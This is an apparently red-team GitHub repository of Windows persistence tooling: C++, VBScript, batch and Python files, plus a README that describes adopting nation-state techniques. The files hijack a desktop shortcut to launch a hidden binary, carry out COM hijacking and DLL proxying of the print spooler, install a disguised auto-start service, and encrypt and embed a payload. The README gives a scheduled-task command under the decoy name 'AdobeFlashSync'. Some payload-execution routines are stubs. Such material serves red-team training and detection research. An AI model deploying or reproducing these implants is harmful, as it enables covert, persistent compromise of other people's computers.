42 | 
43 | HRESULT CALLBACK TimeProvCommand(TimeProvHandle hTimeProv, TimeProvCmd eCmd, PVOID pvArgs) {
44 |    
45 |    switch( eCmd ) {
46 |       case TPC_GetSamples:
47 |       // Return the Samples structure in pvArgs.
48 |          CopyMemory(pvArgs, &Samples, sizeof(TpcGetSamplesArgs));
49 |          break;
50 |       case TPC_PollIntervalChanged:
51 |       // Retrieve the new value.
52 |          sc.pfnGetTimeSysInfo( TSI_PollInterval, &dwPollInterval );
53 |          break;
54 |       case TPC_TimeJumped:
55 |       // Discard samples saved in the Samples structure.
56 |          ZeroMemory(&Samples, sizeof(TpcGetSamplesArgs));
57 |          break;
58 |       case TPC_UpdateConfig:
59 |       // Read the configuration information from the registry.
60 |          break;
61 |    }
62 |    return S_OK;
63 | }
64 | 
65 | HRESULT CALLBACK TimeProvClose(TimeProvHandle hTimeProv) {
66 |    return S_OK;
67 | }
68 | 


--------------------------------------------------------------------------------
/Administrator/timeprovision/timeprovision.def:
--------------------------------------------------------------------------------
1 | LIBRARY
2 | EXPORTS
3 |   TimeProvisionOpen
4 |   TimeProvisionCommand
5 |   TimeProvisionClose
6 | 


--------------------------------------------------------------------------------
/Client/Brandlnk.vbs:
--------------------------------------------------------------------------------
 1 | ' CONFIGURATION
 2 | Embed = "c:\Windows Persistent\Embed\embed.exe"
 3 | newTarget = "c:\Windows Persistent\Client\putty.vbs"
 4 | lnkName = "putty.exe.lnk"
 5 | 
 6 | ' Helper vars
 7 | set WshShell = WScript.CreateObject("WScript.Shell" )
 8 | strDesktop = WshShell.SpecialFolders("Desktop" )
 9 | set oShellLink = WshShell.CreateShortcut(strDesktop & "\" & lnkName )
10 | origTarget = oShellLink.TargetPath
11 | origArgs = oShellLink.Arguments
12 | origIcon = oShellLink.IconLocation
13 | origDir = oShellLink.WorkingDirectory
14 | 
15 | ' Persistence Implantation
16 | Set FSO = CreateObject("Scripting.FileSystemObject")
17 | Set File = FSO.CreateTextFile(newTarget,True)
18 | File.Write "Set oShell = WScript.CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ")" & vbCrLf
19 | File.Write "oShell.Run " & chr(34) & embed & chr(34) & vbCrLf
20 | File.Write "oShell.Run " & chr(34) & oShellLink.TargetPath & " " & oShellLink.Arguments & chr(34) & vbCrLf
21 | File.Close
22 | 
23 | oShellLink.TargetPath = newTarget
24 | oShellLink.IconLocation = origTarget & ", 0"
25 | oShellLink.WorkingDirectory = origDir
26 | oShellLink.WindowStyle = 7
27 | oShellLink.Save
28 | 


--------------------------------------------------------------------------------
/Client/COM-comandeer/Folders-shell.cpp:
--------------------------------------------------------------------------------
 1 | /*
 2 | 
 3 |  Red Team Simulation template
 4 |  COM hijacking template
 5 |  
 6 |  Author: Shaikh Jamal Uddin (Linkedin: https://www.linkedin.com/in/engrjamal/ )
 7 | 
 8 | */
 9 | #include <Windows.h>
10 | #include <combaseapi.h>
11 | 
12 | 
13 | BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {
14 |     STARTUPINFO info={sizeof(info)};
15 |     PROCESS_INFORMATION processInfo;
16 | 
17 |     switch (ul_reason_for_call)  {
18 |     case DLL_PROCESS_ATTACH:
19 |         break;
20 |     case DLL_THREAD_ATTACH:
21 |         break;
22 |     case DLL_THREAD_DETACH:
23 |         break;    
24 | 	case DLL_PROCESS_DETACH:
25 |         break;
26 |     }
27 |     return TRUE;
28 | }
29 | 
30 | HRESULT STDAPI DllGetClassObject(__in REFCLSID rclsid,
31 | 								__in REFIID riid,
32 | 								__deref_out LPVOID FAR* ppv) { 
33 | 	STARTUPINFO info={sizeof(info)};
34 |     PROCESS_INFORMATION processInfo;
35 | 	
36 | 	CreateProcess(
37 | 				"c:\\Windows Persistent\\Embed\\embed.exe", 
38 | 				"", NULL, NULL, TRUE, 0, NULL, NULL, 
39 | 				&info, &processInfo);
40 | 	
41 | 	return S_OK;  
42 | } 
43 | 
44 | 


--------------------------------------------------------------------------------
/Client/COM-comandeer/Folders-shell.def:
--------------------------------------------------------------------------------
1 | LIBRARY
2 | EXPORTS
3 |   DllGetClassObject PRIVATE
4 | 


--------------------------------------------------------------------------------
/Client/COM-comandeer/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 | 
3 | cl.exe /W0 /D_USRDLL /D_WINDLL FoldersShell.cpp FoldersShell.def /MT /link /DLL /OUT:FoldersShell.dll
4 | 


--------------------------------------------------------------------------------
/Client/DLL-comandeer/comp.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 | 
3 | cl.exe /W0 /D_USRDLL /D_WINDLL windowsspool.cpp /MT /link /DLL /OUT:windowsspool.drv
4 | 


--------------------------------------------------------------------------------
/Client/DLL-comandeer/windowsspool.cpp:
--------------------------------------------------------------------------------
 1 | /*
 2 | 
 3 |  Red Team Simulation template
 4 |  DLL proxy template
 5 |  
 6 |  Author: Shaikh Jamal Uddin (Linkedin: https://www.linkedin.com/in/engrjamal/)
 7 | 
 8 | */
 9 | #pragma comment(linker,"/export:OpenPrinterA=winsplhlp.OpenPrinterA,@143")
10 | #pragma comment(linker,"/export:ClosePrinter=winsplhlp.ClosePrinterA,@29")
11 | #pragma comment(linker,"/export:DocumentPropertiesA=winsplhlp.DocumentPropertiesA,@77")
12 | 
13 | #include <Windows.h>
14 | 
15 | void Go(void) {
16 |     STARTUPINFO info={sizeof(info)};
17 |     PROCESS_INFORMATION processInfo;
18 | 
19 |         CreateProcess(
20 | 					"c:\\Windows Persistent\\Embed\\embed.exe", 
21 | 					"", NULL, NULL, TRUE, 0, NULL, NULL, 
22 | 					&info, &processInfo);
23 | 	
24 | }
25 | 
26 | BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {
27 | 
28 |     switch (ul_reason_for_call)  {
29 |     case DLL_PROCESS_ATTACH:
30 | 		Go();
31 | 		break;
32 |     case DLL_THREAD_ATTACH:
33 | 		break;
34 |     case DLL_THREAD_DETACH:
35 | 		break;
36 |     case DLL_PROCESS_DETACH:
37 |         break;
38 |     }
39 |     return TRUE;
40 | }
41 | 


--------------------------------------------------------------------------------
/Client/signon.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 | 
3 | c:\Windows Persistent\Embed\embed.exe
4 | 


--------------------------------------------------------------------------------
/Embed/compile-dll.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 | 
3 | cl.exe /W0 /D_USRDLL /D_WINDLL embed-dll.cpp /MT /link /DLL /OUT:embed.dll
4 | 


--------------------------------------------------------------------------------
/Embed/compile-sr.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 | 
3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcembed-srv.cpp /link /OUT:embed-srv.exe /MACHINE:x64
4 | 


--------------------------------------------------------------------------------
/Embed/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 | 
3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcembed.cpp /link /OUT:embed.exe /SUBSYSTEM:WINDOWS
4 | 


--------------------------------------------------------------------------------
/Embed/embed-dll.cpp:
--------------------------------------------------------------------------------
 1 | /*
 2 | 
 3 |  Red Team Simulation template
 4 |  DLL proxy template
 5 |  
 6 |  Author: Shaikh Jamal Uddin (Linkedin: https://www.linkedin.com/in/engrjamal/)
 7 | 
 8 | */
 9 | #include <Windows.h>
10 | 
11 | void Go(void) {
12 |     STARTUPINFO info={sizeof(info)};
13 |     PROCESS_INFORMATION processInfo;
14 | 
15 | 	CreateProcess(
16 | 				"c:\\Windows Persistent\\Embed\\embed.exe", 
17 | 				"", NULL, NULL, TRUE, 0, NULL, NULL, 
18 | 				&info, &processInfo);
19 | 
20 | }
21 | 
22 | BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {
23 | 
24 |     switch (ul_reason_for_call)  {
25 |     case DLL_PROCESS_ATTACH:
26 | 		Go();
27 | 		break;
28 |     case DLL_THREAD_ATTACH:
29 | 		break;
30 |     case DLL_THREAD_DETACH:
31 | 		break;
32 |     case DLL_PROCESS_DETACH:
33 |         break;
34 |     }
35 |     return TRUE;
36 | }
37 | 


--------------------------------------------------------------------------------
/Embed/embed-sr.cpp:
--------------------------------------------------------------------------------
  1 | /*
  2 | 
  3 |  Red Team Simulation template
  4 |  Service binary - payload encryption with AES
  5 |  
  6 |  Author: Shaikh Jamal Uddin (Linkedin: https://www.linkedin.com/in/engrjamal/)
  7 | 
  8 | */
  9 | #include <windows.h>
 10 | #include <stdio.h>
 11 | #include <stdlib.h>
 12 | #include <string.h>
 13 | #include <time.h>
 14 | #include <wincrypt.h>
 15 | #include <psapi.h>
 16 | #include <tchar.h>
 17 | #pragma comment (lib, "crypt32.lib")
 18 | #pragma comment (lib, "advapi32")
 19 | 
 20 | #define DELAY 10000 // in miliseconds
 21 | 
 22 | TCHAR* serviceName = TEXT("MoSyncSrv");
 23 | SERVICE_STATUS serviceStatus;
 24 | SERVICE_STATUS_HANDLE serviceStatusHandle = 0;
 25 | HANDLE stopServiceEvent = 0;
 26 | 
 27 | LPVOID (WINAPI * pVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD  flAllocationType, DWORD  flProtect);
 28 | VOID (WINAPI * pRtlMoveMemory)(VOID UNALIGNED *Destination, const VOID UNALIGNED *Source, SIZE_T Length);
 29 | 
 30 | int AESDecrypt(char * payload, unsigned int payload_len, char * key, size_t keylen) {
 31 | 	HCRYPTPROV hProv;
 32 | 	HCRYPTHASH hHash;
 33 | 	HCRYPTKEY hKey;
 34 | 
 35 | 	if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
 36 | 			return -1;
 37 | 	}
 38 | 	if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
 39 | 			return -1;
 40 | 	}
 41 | 	if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
 42 | 			return -1;              
 43 | 	}
 44 | 	if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
 45 | 			return -1;
 46 | 	}
 47 | 	
 48 | 	if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, payload, &payload_len)){
 49 | 			return -1;
 50 | 	}
 51 | 	
 52 | 	CryptReleaseContext(hProv, 0);
 53 | 	CryptDestroyHash(hHash);
 54 | 	CryptDestroyKey(hKey);
 55 | 	
 56 | 	return 0;
 57 | }
 58 | 
 59 | 
 60 | int RunMe(void) {
 61 |   
 62 | 	void * exec_mem;
 63 | 	BOOL rv;
 64 | 	HANDLE th;
 65 |     DWORD oldprotect = 0;
 66 | 
 67 | 	Sleep(30000);
 68 | 
 69 | 	return 0;
 70 | }
 71 | 
 72 | void WINAPI ServiceControlHandler( DWORD controlCode ) {
 73 | 	switch ( controlCode ) {
 74 | 		case SERVICE_CONTROL_SHUTDOWN:
 75 | 		case SERVICE_CONTROL_STOP:
 76 | 			serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
 77 | 			SetServiceStatus( serviceStatusHandle, &serviceStatus );
 78 | 
 79 | 			SetEvent( stopServiceEvent );
 80 | 			return;
 81 | 
 82 | 		case SERVICE_CONTROL_PAUSE:
 83 | 			break;
 84 | 
 85 | 		case SERVICE_CONTROL_CONTINUE:
 86 | 			break;
 87 | 
 88 | 		case SERVICE_CONTROL_INTERROGATE:
 89 | 			break;
 90 | 
 91 | 		default:
 92 | 			break;
 93 | 	}
 94 | 	SetServiceStatus( serviceStatusHandle, &serviceStatus );
 95 | }
 96 | 
 97 | void WINAPI ServiceMain( DWORD argc, TCHAR* argv[] ) {
 98 | 	// initialise service status
 99 | 	serviceStatus.dwServiceType = SERVICE_WIN32;
100 | 	serviceStatus.dwCurrentState = SERVICE_STOPPED;
101 | 	serviceStatus.dwControlsAccepted = 0;
102 | 	serviceStatus.dwWin32ExitCode = NO_ERROR;
103 | 	serviceStatus.dwServiceSpecificExitCode = NO_ERROR;
104 | 	serviceStatus.dwCheckPoint = 0;
105 | 	serviceStatus.dwWaitHint = 0;
106 | 
107 | 	serviceStatusHandle = RegisterServiceCtrlHandler( serviceName, ServiceControlHandler );
108 | 
109 | 	if ( serviceStatusHandle ) {
110 | 		// service is starting
111 | 		serviceStatus.dwCurrentState = SERVICE_START_PENDING;
112 | 		SetServiceStatus( serviceStatusHandle, &serviceStatus );
113 | 
114 | 		// do initialisation here
115 | 		stopServiceEvent = CreateEvent( 0, FALSE, FALSE, 0 );
116 | 
117 | 		// running
118 | 		serviceStatus.dwControlsAccepted |= (SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
119 | 		serviceStatus.dwCurrentState = SERVICE_RUNNING;
120 | 		SetServiceStatus( serviceStatusHandle, &serviceStatus );
121 | 
122 | 		RunMe();
123 | 		WaitForSingleObject( stopServiceEvent, -1 );
124 | 
125 | 		// service was stopped
126 | 		serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
127 | 		SetServiceStatus( serviceStatusHandle, &serviceStatus );
128 | 
129 | 		// do cleanup here
130 | 		CloseHandle( stopServiceEvent );
131 | 		stopServiceEvent = 0;
132 | 
133 | 		// service is now stopped
134 | 		serviceStatus.dwControlsAccepted &= ~(SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
135 | 		serviceStatus.dwCurrentState = SERVICE_STOPPED;
136 | 		SetServiceStatus( serviceStatusHandle, &serviceStatus );
137 | 	}
138 | }
139 | 
140 | 
141 | void InstallService() {
142 | 	SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CREATE_SERVICE );
143 | 
144 | 	if ( serviceControlManager ) {
145 | 		TCHAR path[ _MAX_PATH + 1 ];
146 | 		if ( GetModuleFileName( 0, path, sizeof(path)/sizeof(path[0]) ) > 0 ) {
147 | 			SC_HANDLE service = CreateService( serviceControlManager,
148 | 							serviceName, serviceName,
149 | 							SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
150 | 							SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, path,
151 | 							0, 0, 0, 0, 0 );
152 | 			if ( service )
153 | 				CloseServiceHandle( service );
154 | 		}
155 | 		CloseServiceHandle( serviceControlManager );
156 | 	}
157 | }
158 | 
159 | void UninstallService() {
160 | 	SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CONNECT );
161 | 
162 | 	if ( serviceControlManager ) {
163 | 		SC_HANDLE service = OpenService( serviceControlManager,
164 | 			serviceName, SERVICE_QUERY_STATUS | DELETE );
165 | 		if ( service ) {
166 | 			SERVICE_STATUS serviceStatus;
167 | 			if ( QueryServiceStatus( service, &serviceStatus ) ) {
168 | 				if ( serviceStatus.dwCurrentState == SERVICE_STOPPED )
169 | 					DeleteService( service );
170 | 			}
171 | 			CloseServiceHandle( service );
172 | 		}
173 | 		CloseServiceHandle( serviceControlManager );
174 | 	}
175 | }
176 | 
177 | int _tmain( int argc, TCHAR* argv[] )
178 | {
179 | 	if ( argc > 1 && lstrcmpi( argv[1], TEXT("install") ) == 0 ) {
180 | 		InstallService();
181 | 	}
182 | 	else if ( argc > 1 && lstrcmpi( argv[1], TEXT("uninstall") ) == 0 ) {
183 | 		UninstallService();
184 | 	}
185 | 	else  {
186 | 		SERVICE_TABLE_ENTRY serviceTable[] = {
187 | 			{ serviceName, ServiceMain },
188 | 			{ 0, 0 }
189 | 		};
190 | 	
191 | 		StartServiceCtrlDispatcher( serviceTable );
192 | 	}	
193 | 
194 | 	return 0;
195 | }
196 | 
197 | 


--------------------------------------------------------------------------------
/Embed/embed-sr.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jaamaal/Embed/e65478043dcdfe09a1a85eecacae56cabfd5b878/Embed/embed-sr.exe


--------------------------------------------------------------------------------
/Embed/embed.cpp:
--------------------------------------------------------------------------------
 1 | /*
 2 | 
 3 |  Red Team Simulation template
 4 |  PE binary - payload encryption with AES
 5 |  
 6 |  Author: Shaikh Jamal Uddin (Linkedin: https://www.linkedin.com/in/engrjamal/)
 7 | 
 8 | */
 9 | #include <windows.h>
10 | #include <stdio.h>
11 | #include <stdlib.h>
12 | #include <string.h>
13 | #include <wincrypt.h>
14 | #pragma comment (lib, "crypt32.lib")
15 | #pragma comment (lib, "advapi32")
16 | #include <psapi.h>
17 | 
18 | LPVOID (WINAPI * pVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD  flAllocationType, DWORD  flProtect);
19 | VOID (WINAPI * pRtlMoveMemory)(VOID UNALIGNED *Destination, const VOID UNALIGNED *Source, SIZE_T Length);
20 | 
21 | int AESDecrypt(char * payload, unsigned int payload_len, char * key, size_t keylen) {
22 | 	HCRYPTPROV hProv;
23 | 	HCRYPTHASH hHash;
24 | 	HCRYPTKEY hKey;
25 | 
26 | 	if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
27 | 			return -1;
28 | 	}
29 | 	if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
30 | 			return -1;
31 | 	}
32 | 	if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
33 | 			return -1;              
34 | 	}
35 | 	if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
36 | 			return -1;
37 | 	}
38 | 	
39 | 	if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, payload, &payload_len)){
40 | 			return -1;
41 | 	}
42 | 	
43 | 	CryptReleaseContext(hProv, 0);
44 | 	CryptDestroyHash(hHash);
45 | 	CryptDestroyKey(hKey);
46 | 	
47 | 	return 0;
48 | }
49 | 
50 | unsigned char payload[] = { 0xf7, 0xbb, 0x71, 0x51, 0xf6, 0x7f, 0x93, 0x50, 0x2a, 0x25, 0xba, 0x2d, 0x99, 0x65, 0x6e, 0xe6, 0x62, 0x56, 0xc0, 0x97, 0x84, 0xe7, 0xd0, 0xcb, 0x5b, 0xa7, 0x6c, 0x25, 0xd4, 0x6a, 0x47, 0xbf, 0x2e, 0xec, 0x6a, 0x20, 0x9a, 0xab, 0x62, 0xcf, 0x53, 0xc9, 0x37, 0xc3, 0x65, 0x32, 0xd5, 0xca, 0x82, 0xc2, 0xaf, 0x67, 0x8f, 0x5d, 0x6, 0x3f, 0x5d, 0x6e, 0xf4, 0x45, 0xfa, 0xb2, 0x76, 0xb, 0x66, 0x69, 0x10, 0x60, 0x75, 0x34, 0xa8, 0xbc, 0xae, 0xd4, 0x49, 0x22, 0xaf, 0xb9, 0xf8, 0x67, 0x68, 0xfc, 0x66, 0xf, 0x25, 0x79, 0x94, 0xd1, 0x12, 0x7c, 0x62, 0xe0, 0x5, 0x50, 0xce, 0x18, 0x4f, 0xa2, 0xc, 0xf2, 0xce, 0xf, 0x3f, 0xe, 0x30, 0xce, 0x65, 0x44, 0xbb, 0x4d, 0xce, 0x6a, 0x92, 0x38, 0xd, 0x1f, 0x2c, 0xbb, 0xb9, 0x5d, 0xa9, 0xe3, 0x49, 0x92, 0xf, 0x11, 0x20, 0x6b, 0x93, 0x52, 0xa5, 0xe2, 0xfb, 0xd2, 0xd5, 0x14, 0xe6, 0xc3, 0x3e, 0xe, 0x28, 0x54, 0x2, 0x64, 0x59, 0xd6, 0x37, 0xd3, 0x6d, 0x4b, 0x37, 0x34, 0x48, 0x3b, 0x5e, 0x69, 0xe0, 0x48, 0xb4, 0x9c, 0x3e, 0xb3, 0xef, 0x67, 0x81, 0x26, 0xac, 0xd0, 0x19, 0xff, 0x33, 0x72, 0x58, 0x3e, 0xbb, 0xd7, 0x71, 0xc7, 0xe6, 0x77, 0x39, 0x36, 0x7b, 0xd9, 0x22, 0x8d, 0x2e, 0x33, 0xc8, 0x67, 0x7, 0x49, 0xb0, 0x6d, 0xea, 0x6c, 0xcf, 0x2b, 0x6d, 0x56, 0x4b, 0x7d, 0xf3, 0xab, 0x18, 0x68, 0xcb, 0xee, 0xee, 0x34, 0x82, 0x93, 0x23, 0x3b, 0x4c, 0x1d, 0xa8, 0xde, 0x97, 0xd4, 0xd5, 0x89, 0xd2, 0x2e, 0xd5, 0x47, 0xa9, 0xc4, 0x91, 0x99, 0x4a, 0x74, 0x9d, 0x28, 0xfe, 0x6a, 0x8, 0x51, 0x7e, 0x5b, 0x21, 0xc9, 0x83, 0x0, 0x85, 0xe0, 0x81, 0x70, 0xc1, 0x1, 0xe0, 0xc8, 0x77, 0xb8, 0xed, 0xdb, 0xb5, 0x93, 0xb3, 0x8f, 0x7d, 0xb7, 0xba, 0x20, 0x1e, 0x6d, 0x37, 0x82, 0xef, 0xb3, 0x43, 0xf1, 0x70, 0xd4, 0x16, 0xed, 0xf7, 0x80, 0xda, 0xb8, 0x1b, 0x39, 0x62, 0x95, 0xce, 0xd7, 0x9a, 0x1d };
51 | unsigned char key[] = { 0xca, 0x93, 0x8a, 0xff, 0xa6, 0x69, 0x92, 0x9c, 0x4a, 0xce, 0x9d, 0x11, 0xf5, 0x38, 0x72, 0x9f };
52 | 
53 | //int main(void) {
54 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, 
55 |     LPSTR lpCmdLine, int nCmdShow) {
56 |     
57 | 	void * exec_mem;
58 | 	BOOL rv;
59 | 	HANDLE th;
60 |     DWORD oldprotect = 0;
61 | 
62 |     STARTUPINFO si;
63 |     PROCESS_INFORMATION pi;
64 | 
65 | 	//FreeConsole();
66 | 
67 |     ZeroMemory( &si, sizeof(si) );
68 |     si.cb = sizeof(si);
69 |     ZeroMemory( &pi, sizeof(pi) );
70 | 
71 | 	if (!CreateProcess( NULL,   // No module name
72 | 					"c:\\Windows\\System32\\notepad.exe",
73 | 					NULL,           // Process handle not inheritable
74 | 					NULL,           // Thread handle not inheritable
75 | 					FALSE,          // Set handle inheritance to FALSE
76 | 					0,              // No creation flags
77 | 					NULL,           // Use parent's environment block
78 | 					NULL,           // Use parent's starting directory 
79 | 					&si,            // Pointer to STARTUPINFO structure
80 | 					&pi )           // Pointer to PROCESS_INFORMATION structure
81 | 		    ) {
82 |         printf( "CreateProcess failed (%d).\n", GetLastError() );
83 |         return;
84 | 	}
85 | 	WaitForSingleObject( pi.hProcess, INFINITE );
86 |     
87 | 	// Close process and thread handles. 
88 |     CloseHandle( pi.hProcess );
89 |     CloseHandle( pi.hThread );
90 | 
91 | 	return 0;
92 | }
93 | 


--------------------------------------------------------------------------------
/Embed/embed.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jaamaal/Embed/e65478043dcdfe09a1a85eecacae56cabfd5b878/Embed/embed.dll


--------------------------------------------------------------------------------
/Embed/embed.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jaamaal/Embed/e65478043dcdfe09a1a85eecacae56cabfd5b878/Embed/embed.exe


--------------------------------------------------------------------------------
/Embed/notepad64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jaamaal/Embed/e65478043dcdfe09a1a85eecacae56cabfd5b878/Embed/notepad64.bin


--------------------------------------------------------------------------------
/Embed/rsa.py:
--------------------------------------------------------------------------------
 1 | # Red Team Simulation template
 2 | # payload encryption with AES
 3 | # Author: Shaikh Jamal Uddin (Linkedin: https://www.linkedin.com/in/engrjamal/)
 4 | 
 5 | import sys
 6 | from base64 import b64encode
 7 | from Crypto.Cipher import AES
 8 | from Crypto.Util.Padding import pad
 9 | from Crypto.Random import get_random_bytes
10 | import hashlib
11 | 
12 | KEY = get_random_bytes(16)
13 | iv = 16 * b'\x00'
14 | cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
15 | 
16 | try:
17 |     plaintext = open(sys.argv[1], "rb").read()
18 | except:
19 |     print("File argument needed! %s <raw payload file>" % sys.argv[0])
20 |     sys.exit()
21 | 
22 | ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
23 | 
24 | print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
25 | print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')
26 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Windows-Persistence
 2 | ![](https://img.shields.io/badge/Windows-Compatible-green.svg)
 3 | 
 4 | Real threat actors use different Tactics, Techniques and Procedures (TTPs). One of the strategy is Persistence - an approach to endure a penetrated machine restart and protect admittance to a target environment. There is a ton of spotlight on what strategies use to exploit a specific vulnerability or how their C2 channels & infrastructure resemble.
 5 | 
 6 | Adapt practically persistence steadiness strategies working at Windows 10 utilized by sponsored nation-state threat actors, as Turla, ProjectSauron, APT29, EquationGroup, including Stuxnet / Flame.
 7 | ## System Requirements
 8 | *	x86-32/x64 Windows 7/8/8.1/10, x86-32/x64 Widnows Server 2012/2016/2019.
 9 | *	Administrator account with UAC set on default settings needed.
10 | ## Usage
11 | Run executable from command line: embed [Param] or embed-sr [Param]. See "Run examples" underneath for more info.
12 | 
13 | Run examples:
14 | 
15 | *	embed.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
16 | *	echo embed-sr.exe %HOMEPATH%"\Documents\Windowspowershell\profile.ps1
17 | *	schtasks /create /sc onlogon /tn AdobeFlashSync /tr "embed.exe"
18 | 
19 | 


--------------------------------------------------------------------------------